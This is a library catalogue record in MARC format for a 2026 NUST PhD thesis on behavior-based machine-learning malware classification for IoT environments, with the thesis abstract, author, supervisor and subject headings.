| 000 | 02692nam a22001817a 4500 | ||
|---|---|---|---|
| 003 | NUST | ||
| 005 | 20260311125241.0 | ||
| 082 | _a005.8,JAV | ||
| 100 |
_aJaved, Sheikh Muhammad Zeeshan _9133638 |
||
| 245 |
_aMachine Learning based Malware Classification Framework using Malware Behavior / _cSheikh Muhammad Zeeshan Javed |
||
| 260 |
_aRawalpindi, _bMCS (NUST), _c2026 |
||
| 300 | _axvii, 132 p | ||
| 505 | _aMalware analysis is a critical component of modern cybersecurity, enabling the identification, understanding, and mitigation of malicious software. This dissertation investigates the evolution of machine learning–based approaches for large-scale, behavior-driven malware classification, with the objective of improving detection accuracy, scalability, and robustness across diverse computing platforms. Initially, this research presents a comprehensive review of existing machine learning– based malware detection and classification techniques, highlighting their strengths and limitations. Static analysis–based approaches, which extract features directly from executable files without program execution, have gained widespread adoption due to their low computational cost and ease of deployment. However, these methods are highly susceptible to obfuscation, packing, and evasion techniques. Dynamic analysis–based approaches, which examine malware behavior during execution in controlled environments, have been increasingly explored. Although dynamic analysis offers improved resilience against static evasion techniques, many existing approaches rely on a limited set of behavioral features, such as API call sequences. This narrow feature representation limits their ability to capture complex and evolving malware behaviors, thereby reducing classification performance and generalization in real-world, large-scale environments. Subsequently, this dissertation proposes a novel malware classification framework based on a stack ensemble machine learning model that leverages large-scale IoT malware behavioral data. The proposed framework integrates multi-dimensional dynamic features, including memory dump characteristics, file system activities, network interactions, process behaviors, command executions, URL communications, and memory access patterns. A key contribution of this work is its scalability and computational efficiency, which make it well-suited for deployment in resource-constrained IoT environments while achieving high classification accuracy. | ||
| 650 |
_aPhD Information Security Thesis _9132793 |
||
| 651 |
_aPhD IS Thesis _9132794 |
||
| 700 |
_aSupervised by Dr. Muhammad Faisal Amjad _9133639 |
||
| 942 |
_2ddc _cTHE |
||
| 999 |
_c616601 _d616601 |
||